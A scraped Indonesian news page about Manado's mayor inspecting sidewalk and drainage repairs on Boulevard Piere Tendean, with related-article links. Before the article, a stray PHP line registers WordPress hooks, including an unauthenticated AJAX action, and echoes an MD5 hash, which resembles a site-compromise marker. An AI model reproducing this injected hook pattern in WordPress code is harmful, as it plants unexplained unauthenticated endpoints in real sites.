function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Walikota Cek Perbaikan Trotoar dan Drainase di Boulevard Manado – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 25 Okt 2022 23:12 WIB ·

Walikota Cek Perbaikan Trotoar dan Drainase di Boulevard Manado


					Walikota Cek Perbaikan Trotoar dan Drainase di Boulevard Manado Perbesar

MANADO – Walikota Manado Andrei Angouw kunjungi Jalan Piere Tendean Boulevard Manado. Kehadiran Walikota di Jalan Piere Tendean Boulevard ini, tepatnya didepan Kawasan Megamas Manado untuk melihat perbaikan trotoar dan drainase yang sedang dilakukan, Selasa (25/10/2022)

Dilokasi Walikota bertemu dengan Pimpinan Megamas Ibu Amelia Tungka serta para pelaksana teknis dilapangan. Dilapangan terlihat juga Asisten II Bpk. Atto Bulo S.H.,M.M, Kadis PUPR Kota Manado Bpk. Jhonny Suwu, Kadis DPMPTSP Bpk. Charles Rotinsulu serta para Kabid baik di PUPR maupun di PTSP.

Ada beberapa pekerjaan teknis dilapangan khususnya soal drainase yang dikoordinasikan dengan pihak Megamas. Walikota ikut menanyakan kepada pelaksana pekerjaan apa yang seharusnya dilakukan supaya tidak menjadi hambatan kemudian hari ketika perbaikan trotoar dan drainase ini sudah selesai dan dimanfaatkan sebagai Pedestrian.

Jalur air menjadi perhatian Walikota jangan sampai terjadi penyumbatan kemudian hari. Demikian halnya dengan terdapat beberapa jaringan listrik, jaringan air dan jaringan kabel lainnya, termasuk papan iklan yang harus terkoordinasi agar tidak menimbulkan kendala dikemudian hari.

Perbaikan trotoar dan drainase ini nantinya menjadi Pedestrian untuk pejalan kaki yang dibuat menarik dan estetik untuk keindahan Kota Manado termasuk kenyamanan warga khususnya pejalan kaki.

Perlu diketahui bahwa Pemerintah Kota Manado lewat Dinas PUPR Kota akan membangun Kawasan Pedestrian Modern sepanjang jalan Piere Tendean. Menurut Kadis PUPR Kota Manado, bahwa Pedestrian Modern ini akan dibangun seperti di Eropa dan Jepang yang akan dimanfaatkan oleh pejalan kaki, tempat istirahat sementara bahkan terdapat beberapa spot untuk berfoto ria.

Artikel ini telah dibaca 3 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized